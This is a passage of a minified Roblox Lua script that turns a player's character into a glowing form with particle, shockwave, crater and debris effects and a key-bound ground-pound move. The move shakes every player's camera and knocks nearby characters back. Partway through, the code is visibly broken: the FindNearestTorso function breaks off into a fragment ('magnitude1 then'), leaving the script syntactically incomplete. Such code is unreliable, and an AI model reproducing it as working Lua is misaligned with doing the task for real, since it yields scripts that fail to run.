Arm"].BrickColor=BrickColor.new("Really black")p.Character["Right Leg"].BrickColor=BrickColor.new("Really black")p.Character["Left Leg"].BrickColor=BrickColor.new("Really black")p.Character["Left Arm"].BrickColor=BrickColor.new("Really black")p.Character.Head.Material="Granite"p.Character.Torso.Material="Granite"p.Character["Right Arm"].Material="Granite"p.Character["Right Leg"].Material="Granite"p.Character["Left Leg"].Material="Granite"p.Character["Left Arm"].Material="Granite"larm1=Instance.new("Part",char)larm1.Transparency=1;larm1.BrickColor=BrickColor.new("Lime green")larm1.Size=Vector3.new(2.1,4.1,2.1)larm1.Position=Vector3.new(999,999,999)larm1.Material="SmoothPlastic"larm1.Name="larm"larmhold=Instance.new("Weld",char)larmhold.Part0=bk;larmhold.Part1=larm1;larmhold.C0=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))rarm1=Instance.new("Part",char)rarm1.Transparency=1;rarm1.BrickColor=BrickColor.new("Lime green")rarm1.Size=Vector3.new(2.1,4.1,2.1)rarm1.Position=Vector3.new(999,999,999)rarm1.Material="SmoothPlastic"rarm1.Name="rarm"rarmhold=Instance.new("Weld",char)rarmhold.Part0=bl;rarmhold.Part1=rarm1;rarmhold.C0=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))torso1=Instance.new("Part",char)torso1.Transparency=1;torso1.BrickColor=BrickColor.new("Lime green")torso1.Size=Vector3.new(4.1,4.1,2.1)torso1.Position=Vector3.new(999,999,999)torso1.Material="SmoothPlastic"torso1.Name="torsh"torsohold=Instance.new("Weld",char)torsohold.Part0=torso;torsohold.Part1=torso1;torsohold.C0=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))lleg1=Instance.new("Part",char)lleg1.Transparency=1;lleg1.BrickColor=BrickColor.new("Lime green")lleg1.Size=Vector3.new(2.1,4.1,2.1)lleg1.Position=Vector3.new(999,999,999)lleg1.Material="SmoothPlastic"lleg1.Name="lleg"lleghold=Instance.new("Weld",char)lleghold.Part0=bi;lleghold.Part1=lleg1;lleghold.C0=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))rleg1=Instance.new("Part",char)rleg1.Transparency=1;rleg1.BrickColor=BrickColor.new("Lime green")rleg1.Size=Vector3.new(2.1,4.1,2.1)rleg1.Position=Vector3.new(999,999,999)rleg1.Material="SmoothPlastic"rleg1.Name="rleg"rleghold=Instance.new("Weld",char)rleghold.Part0=bj;rleghold.Part1=rleg1;rleghold.C0=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))rhed1=Instance.new("Part",char)rhed1.Transparency=1;rhed1.BrickColor=BrickColor.new("Lime green")rhed1.Size=Vector3.new(4.3,2.6,2.6)rhed1.Position=Vector3.new(999,999,999)rhed1.Material="SmoothPlastic"rhed1.Name="hedd"rhedhold=Instance.new("Weld",char)rhedhold.Part0=bm;rhedhold.Part1=rhed1;rhedhold.C0=CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))rhedmesh1=Instance.new("SpecialMesh",rhed1)rhedmesh1.MeshType="Head"rhedmesh1.Scale=Vector3.new(1,1,1)Character["Torso"].Transparency=1;Character["Head"].Transparency=1;Character["Right Arm"].Transparency=1;Character["Left Arm"].Transparency=1;Character["Right Leg"].Transparency=1;Character["Left Leg"].Transparency=1;W(R.head.Handle,Character.hedd)W(R.torso.Handle,Character.torsh)W(R.rightarm.Handle,Character.rarm)W(R.leftarm.Handle,Character.larm)W(R.rightleg.Handle,Character.rleg)W(R.leftleg.Handle,Character.lleg)R.torso.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.head.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.rightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.rightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)function BurningEff(ec)local qA=Instance.new("ParticleEmitter",ec)qA.Size=NumberSequence.new(.1)qA.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(.2,0),NumberSequenceKeypoint.new(1,1)})qA.LightEmission=0;qA.Lifetime=NumberRange.new(0)qA.Speed=NumberRange.new(0)qA.Rate=0;qA.Texture="rbxassetid://284205403"qA.Acceleration=Vector3.new(0,10,0)qA.Color=ColorSequence.new(Color3.new(0,255,0))local qB=Instance.new("ParticleEmitter",ec)qB.Size=NumberSequence.new(.1)qB.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(.2,0),NumberSequenceKeypoint.new(1,1)})qB.LightEmission=0;qB.Lifetime=NumberRange.new(0)qB.Speed=NumberRange.new(0)qB.Rate=0;qB.Texture="rbxassetid://347504259"qB.Acceleration=Vector3.new(0,10,0)qB.Color=ColorSequence.new(Color3.new(0,255,0))local qC=Instance.new("ParticleEmitter",ec)qC.Size=NumberSequence.new(1)qC.Transparency=NumberSequence.new({NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,1)})qC.LightEmission=0;qC.Lifetime=NumberRange.new(0)qC.Speed=NumberRange.new(0)qC.Rate=0;qC.Texture="rbxassetid://284205403"qC.Acceleration=Vector3.new(0,10,0)qC.Color=ColorSequence.new(Color3.new(0,255,0))end;Face='rbxassetid://0'local qD=bm:FindFirstChild'face'qD.Texture=Face;qD=Instance.new("Decal",bm)qD.Face="Front"qD.Texture="rbxassetid://0"BurningEff(bm)BurningEff(bl)BurningEff(bk)BurningEff(torso)LightOnBody=Instance.new("PointLight",bm)LightOnBody.Brightness=0;LightOnBody.Range=0;LightOnBody.Color=Color3.new(0,255,0)CV="Pastel blue"local qE=Instance.new("BillboardGui",char)qE.Adornee=bm;qE.Name="_status"qE.Size=UDim2.new(2,0,1.2,0)qE.StudsOffset=Vector3.new(-9,8,0)local qF=Instance.new("TextLabel",qE)qF.Size=UDim2.new(10,0,7,0)qF.FontSize="Size24"qF.TextScaled=true;qF.TextTransparency=0;qF.BackgroundTransparency=1;qF.TextTransparency=0;qF.TextStrokeTransparency=0;qF.Font="Antique"qF.TextStrokeColor3=Color3.new(0,255,0)v=Instance.new("Part")v.Name="ColorBrick"v.Parent=p.Character;v.FormFactor="Symmetric"v.Anchored=true;v.CanCollide=false;v.BottomSurface="Smooth"v.TopSurface="Smooth"v.Size=Vector3.new(10,5,3)v.Transparency=1;v.CFrame=char.Torso.CFrame;v.BrickColor=BrickColor.new(CV)v.Transparency=1;qF.TextColor3=Color3.new(0,0,0)v.Shape="Block"qF.Text=""if q8==true then for T,v in pairs(workspace:GetChildren())do if v:IsA("Part")then if v.Size.x>150 then v.CFrame=CFrame.new(v.Position)*CFrame.Angles(q7(math.random(-1,1)),q7(math.random(-1,1)),q7(math.random(-1,1)))end end end end;if q9==true then for T,v in pairs(workspace:GetChildren())do if v:IsA("Part")then if v.Size.x>150 then v.CFrame=CFrame.new(v.Position)*CFrame.Angles(q7(math.random(-2,2)),q7(math.random(-2,2)),q7(math.random(-2,2)))end end end end;local bA=0;GroundWave2=function()local qG=char["Beam"..bA].CFrame*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0))Colors={"White","White"}local qH=Instance.new("Part",char)qH.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qH.Anchored=true;qH.Name="Wave"qH.CanCollide=false;qH.Locked=true;qH.Size=Vector3.new(1,1,1)qH.TopSurface="Smooth"qH.BottomSurface="Smooth"qH.Transparency=0.35;qH.CFrame=qG;wm1=Instance.new("SpecialMesh",qH)wm1.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm1.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qH.Size=wm1.Scale;qH.CFrame=qG;qH.Transparency=T/30;wait()end;wait()qH:Destroy()end)()end;GroundWave3=function()local qG=char["Beam"..bA].CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))Colors={"White","White"}local qI=Instance.new("Part",char)qI.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qI.Anchored=true;qI.Name="Wave"qI.CanCollide=false;qI.Locked=true;qI.Size=Vector3.new(1,1,1)qI.TopSurface="Smooth"qI.BottomSurface="Smooth"qI.Transparency=0.35;qI.CFrame=qG;wm2=Instance.new("SpecialMesh",qI)wm2.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm2.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qI.Size=wm2.Scale;qI.CFrame=qG;qI.Transparency=T/30;wait()end;wait()qI:Destroy()end)()end;GroundWave4=function()local qG=char["Beam"..bA].CFrame*CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))Colors={"White","White"}local qJ=Instance.new("Part",char)qJ.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qJ.Anchored=true;qJ.Name="Wave"qJ.CanCollide=false;qJ.Locked=true;qJ.Size=Vector3.new(1,1,1)qJ.TopSurface="Smooth"qJ.BottomSurface="Smooth"qJ.Transparency=0.35;qJ.CFrame=qG;wm3=Instance.new("SpecialMesh",qJ)wm3.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm3.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qJ.Size=wm3.Scale;qJ.CFrame=qG;qJ.Transparency=T/30;wait()end;wait()qJ:Destroy()end)()end;GroundWave5=function()local qG=lf.CFrame*CFrame.Angles(math.rad(0),math.rad(90),math.rad(0))Colors={"Lime green","Lime green"}local qK=Instance.new("Part",char)qK.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qK.Anchored=true;qK.Name="Wave"qK.CanCollide=false;qK.Locked=true;qK.Size=Vector3.new(1,1,1)qK.TopSurface="Smooth"qK.BottomSurface="Smooth"qK.Transparency=0.35;qK.CFrame=qG;wm31=Instance.new("SpecialMesh",qK)wm31.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm31.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qK.Size=wm31.Scale;qK.CFrame=qG;qK.Transparency=T/30;wait()end;wait()qK:Destroy()end)()end;GroundWave6=function()local qG=lf.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))Colors={"Lime green","Lime green"}local qL=Instance.new("Part",char)qL.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qL.Anchored=true;qL.Name="Wave"qL.CanCollide=false;qL.Locked=true;qL.Size=Vector3.new(1,1,1)qL.TopSurface="Smooth"qL.BottomSurface="Smooth"qL.Transparency=0.35;qL.CFrame=qG;wm311=Instance.new("SpecialMesh",qL)wm311.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm311.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qL.Size=wm311.Scale;qL.CFrame=qG;qL.Transparency=T/30;wait()end;wait()qL:Destroy()end)()end;GroundWave7=function()local qG=lf.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))Colors={"Lime green","Lime green"}local qM=Instance.new("Part",char)qM.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qM.Anchored=true;qM.Name="Wave"qM.CanCollide=false;qM.Locked=true;qM.Size=Vector3.new(1,1,1)qM.TopSurface="Smooth"qM.BottomSurface="Smooth"qM.Transparency=0.35;qM.CFrame=qG;wm3111=Instance.new("SpecialMesh",qM)wm3111.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm3111.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qM.Size=wm3111.Scale;qM.CFrame=qG;qM.Transparency=T/30;wait()end;wait()qM:Destroy()end)()end;GroundWave8=function()local qG=lf.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))Colors={"Lime green","Lime green"}local qN=Instance.new("Part",char)qN.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qN.Anchored=true;qN.Name="Wave"qN.CanCollide=false;qN.Locked=true;qN.Size=Vector3.new(1,1,1)qN.TopSurface="Smooth"qN.BottomSurface="Smooth"qN.Transparency=0.35;qN.CFrame=qG;wm31111=Instance.new("SpecialMesh",qN)wm31111.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm31111.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qN.Size=wm31111.Scale;qN.CFrame=qG;qN.Transparency=T/30;wait()end;wait()qN:Destroy()end)()end;GroundWave9=function()local qG=lf.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))Colors={"Lime green","Lime green"}local qO=Instance.new("Part",char)qO.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qO.Anchored=true;qO.Name="Wave"qO.CanCollide=false;qO.Locked=true;qO.Size=Vector3.new(1,1,1)qO.TopSurface="Smooth"qO.BottomSurface="Smooth"qO.Transparency=0.35;qO.CFrame=qG;wm311111=Instance.new("SpecialMesh",qO)wm311111.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm311111.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qO.Size=wm311111.Scale;qO.CFrame=qG;qO.Transparency=T/30;wait()end;wait()qO:Destroy()end)()end;GroundWave10=function()local qG=lf.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))Colors={"Lime green","Lime green"}local qP=Instance.new("Part",char)qP.BrickColor=BrickColor.new(Colors[math.random(1,#Colors)])qP.Anchored=true;qP.Name="Wave"qP.CanCollide=false;qP.Locked=true;qP.Size=Vector3.new(1,1,1)qP.TopSurface="Smooth"qP.BottomSurface="Smooth"qP.Transparency=0.35;qP.CFrame=qG;wm3111111=Instance.new("SpecialMesh",qP)wm3111111.MeshId="rbxassetid://3270017"coroutine.wrap(function()for T=1,30,1 do wm3111111.Scale=Vector3.new(5+T*5.2,3+T*5.2,5)qP.Size=wm3111111.Scale;qP.CFrame=qG;qP.Transparency=T/30;wait()end;wait()qP:Destroy()end)()end;local qG=CFrame.new(lf.Position-Vector3.new(0,3,0))*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))function nooutline(ec)ec.TopSurface,ec.BottomSurface,ec.RightSurface,ec.LeftSurface,ec.FrontSurface,ec.BackSurface=10,10,10,10,10,10 end;function debris(qQ,qR,ox)for qS=1,ox do do local qT=Instance.new("Part")nooutline(qT)qT.Name="debrisobeb"qT.Anchored=true;qT.BrickColor=qR.BrickColor;qT.CanCollide=true;qT.Material=qR.Material;qT.Transparency=qR.Transparency;qT.Size=Vector3.new(math.random(16,24),math.random(12,16),math.random(16,24))qT.CFrame=qQ*CFrame.Angles(0,math.rad(ox*qS),0)*CFrame.new(0,-5,math.random(18,22))*CFrame.Angles(math.rad(math.random(-30,-15)),math.rad(math.random(0,1)),math.rad(math.random(0,1)))qT.Parent=workspace;game.Debris:AddItem(qT,25)delay(15,function()if qT then qT.CanCollide=false;qT.Anchored=false end end)end end;for c=1,ox do do local qU=Instance.new("Part")nooutline(qU)qU.Name="moredebr"qU.Anchored=false;qU.BrickColor=qR.BrickColor;qU.CanCollide=false;qU.Material=qR.Material;qU.Transparency=qR.Transparency;qU.Size=Vector3.new(math.random(8,18),math.random(6,18),math.random(8,18))qU.CFrame=qQ*CFrame.Angles(0,math.rad(30*c),0)*CFrame.new(0,-5,math.random(18,22))*CFrame.Angles(math.rad(math.random(-30,-15)),math.rad(math.random(0,1)),math.rad(math.random(0,1)))qU.Parent=workspace;qU.Velocity=Vector3.new(math.random(-75,75),math.random(120,240),math.random(-75,75))qU.RotVelocity=Vector3.new(math.random(-35,35),math.random(-35,35),math.random(-35,35))game.Debris:AddItem(qU,45)delay(2,function()qU.CanCollide=true;wait(10)if qU then qU.CanCollide=false end end)end end end;function weld5(eQ,eR,dH,dG)weeld=Instance.new("Weld",eQ)weeld.Part0=eQ;weeld.Part1=eR;weeld.C0=dH;weeld.C1=dG;return weeld end;par,loc=workspace:FindPartOnRay(Ray.new(lf.Position,(lf.Position-(lf.Position-Vector3.new(0,2,0))).unit*-500),lf)local qV=math.acos;local qW=math.sqrt;local qX=Vector3.new;local qY=CFrame.fromAxisAngle;local function qZ(eX)local dW,dX,dY,q_,r0,r1,r2,r3,r4,r5,r6,r7=eX:components()local k8=math.acos((q_+r3+r7-1)/2)local r8=(r6-r4)^2+(r1-r5)^2+(r2-r0)^2;r8=r8==0 and 0.00001 or r8;local r9=(r6-r4)^2+(r1-r5)^2+(r2-r0)^2;r9=r9==0 and 0.00001 or r9;local b9=(r6-r4)^2+(r1-r5)^2+(r2-r0)^2;b9=b9==0 and 0.00001 or b9;local x=(r6-r4)/qW(r8)local iP=(r1-r5)/qW(r9)local z=(r2-r0)/qW(b9)return qX(x,iP,z),k8 end;function ApplyTrig(fh,ra)local jC,eU=ra(0),ra(1)local T=ra(fh)return(T-jC)/(eU-jC)end;function LerpCFrame(rb,rc,fh)local re,rf=qZ(rb:inverse()*rc)return rb*qY(re,rf*fh)+(rc.p-rb.p)*fh end;function Crater(Torso,rg)Spawn(function()local Ray=Ray.new(Torso.Position,Vector3.new(0,-1,0)*10)local eV={}for T,v in pairs(game:GetService("Players"):GetPlayers())do if v.Character~=nil then eV[#eV+1]=v.Character end end;local jD,eS,ri=Workspace:FindPartOnRayWithIgnoreList(Ray,eV)if jD==nil then return end;local rj={}for T=1,360,10 do local rk=Instance.new("Part",Torso.Parent)rk.Anchored=true;rk.FormFactor="Custom"rk.BrickColor=jD.BrickColor;rk.Material=jD.Material;rk.TopSurface="Smooth"rk.BottomSurface="Smooth"rk.CanCollide=false;rk.Size=Vector3.new(10,20,20)*math.random(80,100)/100;rk.CFrame=(CFrame.new(eS,eS+ri)*CFrame.Angles(math.rad(90),0,0)-Vector3.new(0,7,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))rj[#rj+1]={rk,rk.CFrame,(CFrame.new(eS,eS+ri)*CFrame.Angles(math.rad(90),0,0)-Vector3.new(0,1,0))*CFrame.Angles(0,math.rad(T),0)*CFrame.new(0,0,-rg)*CFrame.Angles(math.rad(math.random(-50,-20)),math.rad(math.random(-15,15)),math.rad(math.random(-15,15))),rk.Size}if math.random(0,0)==0 then local rk=Instance.new("Part",Torso.Parent)rk.Anchored=true;rk.FormFactor="Custom"rk.BrickColor=jD.BrickColor;rk.Material=jD.Material;rk.TopSurface="Smooth"rk.CanCollide=false;rk.BottomSurface="Smooth"rk.Size=Vector3.new(4,4,4)*math.random(80,100)/100;rk.CFrame=(CFrame.new(eS,eS+ri)*CFrame.Angles(math.rad(90),0,0)-Vector3.new(0,2.5,0))*CFrame.Angles(math.rad(math.random(-50,50)),math.rad(math.random(-50,50)),math.rad(math.random(-50,50)))rj[#rj+1]={rk,rk.CFrame,CFrame.new(eS,eS+ri)*CFrame.Angles(math.rad(90),0,0)*CFrame.Angles(0,math.rad(T),0)*CFrame.new(0,0,-rg-8)*CFrame.Angles(math.rad(math.random(-90,90)),math.rad(math.random(-90,90)),math.rad(math.random(-90,90))),rk.Size}end end;for T=0,1,0.05 do for rl,v in pairs(rj)do v[1].CFrame=LerpCFrame(v[2],v[3],ApplyTrig(T,math.cos))end;wait(0.02)end;for T,v in pairs(rj)do if v[1].Size.X>2.1 then v[1].CFrame=v[1].CFrame+Vector3.new(0,2,0)end;v[1].Anchored=false end;for T=0,1,0.05 do for rl,v in pairs(rj)do v[1].Transparency=T;if T==1 then v[1]:Destroy()elseif T>=0.25 then v[1].CanCollide=false end end;wait(0.02)end;rj=nil end)end;function FindNearestTorso(i,nj,rm)if rm then return(rm.Torso.CFrame.p-i).magnitude1 then for T=1,30 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.4,3.2,-.5)*CFrame.Angles(math.rad(160),math.rad(0),math.rad(-10)),0.6)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.4,3.2,-.5)*CFrame.Angles(math.rad(160),math.rad(0),math.rad(10)),0.6)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,.2)*CFrame.Angles(math.rad(16),math.rad(0),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-5,0)*CFrame.Angles(math.rad(-90),math.rad(0),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1,-3,.4)*CFrame.Angles(math.rad(-20),math.rad(0),math.rad(0)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1,-2,.4)*CFrame.Angles(math.rad(-20),math.rad(0),math.rad(0)),0.6)if Debounces.on==false then break end;wait()end end;Debounces.on=false;Debounces.NoIdl=false;local rH,ht,rI=nil,nil,nil;while ht==nil do rH,ht,rI=newRay(lf.CFrame*CFrame.new(0,-2,0),lf.CFrame*CFrame.new(0,-3,0),4.1,{char})wait()end;coroutine.resume(coroutine.create(function()for T,v in pairs(workspace:children())do charr=v:FindFirstChild('Character')for T=1,15 do charr.Humanoid.CameraOffset=Vector3.new(math.random(-0.7,0.7),math.random(-0.7,0.7),math.random(-0.7,0.7))wait()end;charr.Humanoid.CameraOffset=Vector3.new(0,0,0)end end))coroutine.resume(coroutine.create(function()for T=1,15 do char.Humanoid.CameraOffset=Vector3.new(math.random(-0.7,0.7),math.random(-0.7,0.7),math.random(-0.7,0.7))wait()end;char.Humanoid.CameraOffset=Vector3.new(0,0,0)end))coroutine.resume(coroutine.create(function()Landing2()end))Landing()game:GetService("Debris"):AddItem(rz,1)game:GetService("Debris"):AddItem(rng2,1)game:GetService("Debris"):AddItem(rng3,1)game:GetService("Debris"):AddItem(rng4,1)game:GetService("Debris"):AddItem(rng5,1)hum.WalkSpeed=16;if Debounces.CanAttack==false then Debounces.CanAttack=true end end end end)ptez={0.7,0.8,0.9,1}function GroundPound()local rz=Instance.new("Part",char)rz.Anchored=true;rz.BrickColor=BrickColor.new("Lime green")rz.CanCollide=false;rz.FormFactor=3;rz.Name="Ring"rz.Size=Vector3.new(1,1,1)rz.Transparency=0.35;rz.TopSurface=0;rz.BottomSurface=0;rz.Position=bk.Position-Vector3.new(0,4,0)rz.CFrame=rz.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))local rA=Instance.new("SpecialMesh",rz)rA.MeshId="http://www.roblox.com/asset/?id=3270017"rA.Scale=Vector3.new(1,1,2)coroutine.resume(coroutine.create(function()t=Instance.new("Sound",char)t.SoundId="http://www.roblox.com/asset/?id=142070127"t.Pitch=ptez[math.random(1,#ptez)]t.Volume=1;wait(.1)t:Play()end))coroutine.wrap(function()for T=1,60,2 do rA.Scale=Vector3.new(2+T*2,2+T*2,1)rz.Transparency=T/60;wait()end;wait()rz:Destroy()end)()end;function GroundPound2()local rz=Instance.new("Part",char)rz.Anchored=true;rz.BrickColor=BrickColor.new("Lime green")rz.CanCollide=false;rz.FormFactor=3;rz.Name="Ring"rz.Size=Vector3.new(1,1,1)rz.Transparency=0.35;rz.TopSurface=0;rz.BottomSurface=0;rz.Position=bl.Position-Vector3.new(0,4,0)rz.CFrame=rz.CFrame*CFrame.Angles(math.rad(90),math.rad(0),math.rad(0))local rA=Instance.new("SpecialMesh",rz)rA.MeshId="http://www.roblox.com/asset/?id=3270017"rA.Scale=Vector3.new(1,1,2)coroutine.resume(coroutine.create(function()t=Instance.new("Sound",char)t.SoundId="http://www.roblox.com/asset/?id=142070127"t.Pitch=ptez[math.random(1,#ptez)]t.Volume=1;wait(.1)t:Play()end))coroutine.wrap(function()for T=1,60,2 do rA.Scale=Vector3.new(2+T*2,2+T*2,1)rz.Transparency=T/60;wait()end;wait()rz:Destroy()end)()end;mouse.KeyDown:connect(function(dr)if dr=="h"then if Debounces.CanAttack==true then Debounces.CanAttack=false;Debounces.NoIdl=true;Debounces.on=true;coroutine.resume(coroutine.create(function()for T,v in pairs(workspace:children())do charr=v:FindFirstChild('Character')for T=1,48 do charr.Humanoid.CameraOffset=Vector3.new(math.random(-0.7,0.7),math.random(-0.7,0.7),math.random(-0.7,0.7))wait()end;charr.Humanoid.CameraOffset=Vector3.new(0,0,0)end end))coroutine.resume(coroutine.create(function()for T=1,78 do char.Humanoid.CameraOffset=Vector3.new(math.random(-0.7,0.7),math.random(-0.7,0.7),math.random(-0.7,0.7))wait()end;char.Humanoid.CameraOffset=Vector3.new(0,0,0)end))coroutine.resume(coroutine.create(function()wait(0.1)for T=1,78 do for T,v in pairs(FindNearestTorso(torso.CFrame.p,25))do if v:FindFirstChild('Humanoid')then v.Humanoid:TakeDamage(math.random(0,0))v.Humanoid.PlatformStand=true;v:FindFirstChild("Torso").Velocity=bm.CFrame.lookVector*100 end end end end))GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-20)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(-50)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(-20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(30)),0.6)if Debounces.on==false then break end;wait()end;GroundPound()for T=1,5 do bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(3,.9,1)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(50)),0.7)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-2.2,.9,-2.2)*CFrame.Angles(math.rad(90),math.rad(0),math.rad(20)),0.7)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,3,-.2)*CFrame.Angles(math.rad(-14),math.rad(20),0),0.6)torso.Weld.C0=Lerp(torso.Weld.C0,CFrame.new(0,-2.2,0)*CFrame.Angles(math.rad(-80),math.rad(-20),0),0.6)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-1.2,-2,-.4)*CFrame.Angles(math.rad(80),0,math.rad(-30)),0.6)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(1.2,-2,-1)*CFrame.Angles(math.rad(80),0,math.rad(10)),0.6)if Debounces.on==false then break end;wait()end;GroundPound2()for T=1,5 do 